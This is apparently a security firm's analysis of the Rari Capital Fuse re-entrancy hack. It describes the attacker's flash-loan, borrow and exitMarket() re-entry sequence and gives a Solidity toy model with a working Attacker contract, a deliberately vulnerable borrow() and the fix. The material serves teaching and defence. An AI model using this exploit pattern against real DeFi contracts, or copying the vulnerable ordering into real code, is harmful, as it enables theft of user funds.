Rari Capital Hack Analysis & POC

By Abdul Sami J.

Introduction

Rari Capital's Fuse lending pools were drained of around $79M through a classic re-entrancy attack. Rari's pool contracts are a fork of Compound Finance, whose borrow() has the same send-before-record ordering but is protected in upstream Compound by sending ETH with transfer() and its 2300-gas stipend; Rari's modifications lost that protection. It is not the first time Rari has been the victim of a hack.

Pre-requisite

  1. Rari's Fuse pools are a fork of Compound Finance. Compound's borrow() sends the borrowed asset to the borrower before it records the borrower's debt, an interactions-before-effects order that is only safe because upstream CEther uses transfer(), whose 2300-gas stipend is too little for the recipient to call back into the protocol. Fuse's CEther sends ETH with a low-level call that forwards all remaining gas, so the borrower's fallback runs with full gas while its debt is still zero.
  2. Rari mitigated re-entrancy into the cTokens themselves with a pool-wide re-entrancy guard: while one cToken of a pool is inside a guarded function, no other cToken of that pool can be entered.
  3. Each pool also has a comptroller, the accounting contract that decides what counts as collateral: enterMarkets() makes a deposited asset count towards the account's borrowing power, and exitMarket() removes it again.
  4. The comptroller's functions were not covered by that guard. exitMarket() decides whether collateral may be released from the borrow balances it reads out of the cTokens, so a re-entrant call placed before the new debt is written sees an account that owes nothing and releases the collateral. Once an asset is no longer entered as collateral, it can be withdrawn at any time without a liquidity check.

The Exploit

The attacker used two contracts:

  1. one that exploits the Rari Fuse pools;
  2. one that receives the profits after each exploit.

Seven pools were affected (8, 18, 27, 127, 144, 146, 156). The draining transactions:

  1. https://etherscan.io/tx/0xa185f63b82cbb199a435399cfd414b89ebab91485d5034cdf8861a5f958259a4
  2. https://etherscan.io/tx/0xadbe5cf9269a001d50990d0c29075b402bcc3a0b0f3258821881621b787b35c6
  3. https://etherscan.io/tx/0x0f75349606610313cb666277eeda612e72be624cae061d017e503056bbf4d8e0
  4. https://etherscan.io/tx/0x0742b138a78ad9bd5d0b55221d514637313bc64c40272ca98c8d0417a519e2e4
  5. https://etherscan.io/tx/0x254735c6c14e4d338b1cc5bca43aab6b0f395ae06085013b1b2527180d270a31
  6. https://etherscan.io/tx/0xab486012f21be741c9e674ffda227e30518e8a1e37a5f1d58d0b0d41f6e76530
  7. https://etherscan.io/tx/0x9e4d4f4ebb45d1e03813d834494045c1b6ea2adbde1b89fbe24349846c223779

We focus on the following transaction to understand the hack: https://etherscan.io/tx/0xadbe5cf9269a001d50990d0c29075b402bcc3a0b0f3258821881621b787b35c6

  1. The attacker took a flash loan of 50,000 WETH and 80,000 wstETH from the Balancer vault.
  2. The attacker deposited the 80,000 wstETH as collateral into the fWSTETH market of Fuse pool 146.
  3. The attacker borrowed 2,397 ETH from pool 146's ETH market. The market sends the ETH to the borrower before it updates the borrower's debt record. Contract on Etherscan: https://etherscan.io/address/0x49da42a1eca4ac6ca0c6943d9e5dc64e4641e0e3#code
  4. Sending the ETH triggers the fallback of the exploit contract. Inside it, the attacker re-enters the comptroller's exitMarket() for fWSTETH; because the 2,397 ETH debt has not yet been written, the comptroller sees an account with no borrows and drops the wstETH from its collateral set. With the wstETH no longer counted as collateral, the attacker withdraws the full 80,000 wstETH.
  5. The attacker now holds the 2,397 ETH with nothing backing the debt and transfers it to the second contract to claim later.
  6. The deposit, borrow and re-entrant exit (steps 2 to 5) are repeated until the pool has no more ETH to lend, after which the flash loan is repaid.
  7. The same strategy is applied to the 7 pools listed above, for a total profit of about $79M.
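The sequence in steps 2 to 5, with the hardened ordering beside it, as a self-contained Solidity model. This is an added example written for this write-up; it is not Rari's or Compound's code and not the PoC repo, and every contract, function and variable name in it is invented for the model. It assumes one collateral market and one ETH market sharing a comptroller, 1:1 prices, a 100% collateral factor, no interest, and a collateral asset reduced to bookkeeping. Constructing EthMarket with effectsFirst = false reproduces the bug; true applies the checks-effects-interactions fix.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;
// Toy model of the Fuse borrow()/exitMarket() re-entrancy. Added example for this write-up, not
// Rari or Compound code; every name is invented. Assumes one collateral market and one ETH market
// per pool, 1:1 prices, 100% collateral factor, no interest, and bookkeeping-only collateral.
interface IMarket {
    function collateralOf(address account) external view returns (uint256);
    function borrowOf(address account) external view returns (uint256);
}

contract Comptroller {
    address[] public markets;
    mapping(address => mapping(address => bool)) public membership; // market => account => counts as collateral
    bool public locked; // pool-wide lock taken by market functions (no access control: model only)
    function addMarket(address m) external { markets.push(m); }
    function enterMarket(address m) external { membership[m][msg.sender] = true; }
    function lock() external { require(!locked, "re-entered"); locked = true; }
    function unlock() external { locked = false; }
    // Collateral counts only for entered markets; debt always counts. `exclude` is a market
    // being exited and `extraDebt` a borrow about to be taken.
    function liquidityOk(address acct, address exclude, uint256 extraDebt) public view returns (bool) {
        (uint256 coll, uint256 debt) = (0, extraDebt);
        for (uint256 i = 0; i < markets.length; i++) {
            if (membership[markets[i]][acct] && markets[i] != exclude) coll += IMarket(markets[i]).collateralOf(acct);
            debt += IMarket(markets[i]).borrowOf(acct);
        }
        return coll >= debt;
    }
    // BUG: exitMarket() ignores the pool lock. Called from inside a vulnerable borrow(), it
    // reads a borrowOf() that has not been updated yet and releases the collateral.
    function exitMarket(address m) external {
        require(IMarket(m).borrowOf(msg.sender) == 0, "owes this market");
        require(liquidityOk(msg.sender, m, 0), "would be undercollateralized");
        membership[m][msg.sender] = false;
    }
}

contract CollateralMarket is IMarket {
    Comptroller immutable c;
    mapping(address => uint256) public override collateralOf;
    constructor(Comptroller _c) { c = _c; }
    function borrowOf(address) external pure override returns (uint256) { return 0; }
    function mint(uint256 amount) external { c.lock(); collateralOf[msg.sender] += amount; c.unlock(); }
    // As in Compound, redeeming from a market the account has exited needs no liquidity check.
    function redeemAll() external {
        c.lock();
        if (c.membership(address(this), msg.sender)) require(c.liquidityOk(msg.sender, address(this), 0), "undercollateralized");
        collateralOf[msg.sender] = 0;
        c.unlock();
    }
}

contract EthMarket is IMarket {
    Comptroller immutable c;
    bool immutable effectsFirst; // true = checks-effects-interactions order, i.e. the fix
    mapping(address => uint256) public override borrowOf;
    constructor(Comptroller _c, bool _effectsFirst) payable { c = _c; effectsFirst = _effectsFirst; }
    function collateralOf(address) external pure override returns (uint256) { return 0; }
    function borrow(uint256 amount) external {
        c.lock();
        require(c.liquidityOk(msg.sender, address(0), amount), "insufficient collateral");
        if (effectsFirst) borrowOf[msg.sender] += amount;
        // Fuse sent ETH with a low-level call, forwarding all gas to the borrower's receive();
        // upstream Compound's transfer() leaves only the 2300-gas stipend, too little to re-enter.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        if (!effectsFirst) borrowOf[msg.sender] += amount; // vulnerable: debt written after the call
        c.unlock();
    }
}

contract Attacker {
    Comptroller immutable c; CollateralMarket immutable coll; EthMarket immutable eth;
    constructor(Comptroller _c, CollateralMarket _coll, EthMarket _eth) { c = _c; coll = _coll; eth = _eth; }
    // Steps 2 to 5 of the write-up, flash loan omitted: deposit, borrow, re-enter, redeem.
    function attack(uint256 collateral, uint256 toBorrow) external {
        coll.mint(collateral);
        c.enterMarket(address(coll));
        eth.borrow(toBorrow);  // re-enters exitMarket() through receive() below
        coll.redeemAll();      // membership is gone, so no liquidity check stops this
    }
    receive() external payable {
        c.exitMarket(address(coll)); // cTokens hold the pool lock here; exitMarket() never checks it
    }
}

contract Demo {
    // Deploys a pool, funds its ETH market with msg.value and runs one round of the attack.
    function run(bool effectsFirst) external payable returns (bool exploited, uint256 debt, uint256 collateralLeft, uint256 ethGained) {
        Comptroller c = new Comptroller();
        CollateralMarket coll = new CollateralMarket(c);
        EthMarket eth = new EthMarket{value: msg.value}(c, effectsFirst);
        c.addMarket(address(coll)); c.addMarket(address(eth));
        Attacker a = new Attacker(c, coll, eth);
        try a.attack(80_000 ether, msg.value) { exploited = true; } catch { exploited = false; }
        return (exploited, eth.borrowOf(address(a)), coll.collateralOf(address(a)), address(a).balance);
    }
}
```

Deploy Demo and call run{value: 2397 ether}(false) in Remix or from a Foundry test: it returns exploited = true, a debt of 2,397 ETH against zero remaining collateral, and 2,397 ETH sitting in the attacker contract. run{value: 2397 ether}(true) returns exploited = false with all four values at zero, because exitMarket() now sees the recorded debt and reverts inside the attacker's receive(), which unwinds the whole borrow. Making exitMarket() honour the same pool-wide lock the cTokens take (a require(!locked) in the model) would block this path just as well; doing both is the defensible choice, since the lock also covers re-entry paths that the ordering alone does not.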

Hack Yourself!

Here is the GitHub repo with a PoC for the hack.

BlockApex

We exist to build trust in the web3 ecosystem by cultivating veterans that are experts in security, testing and audits. Visit the website: https://blockapex.io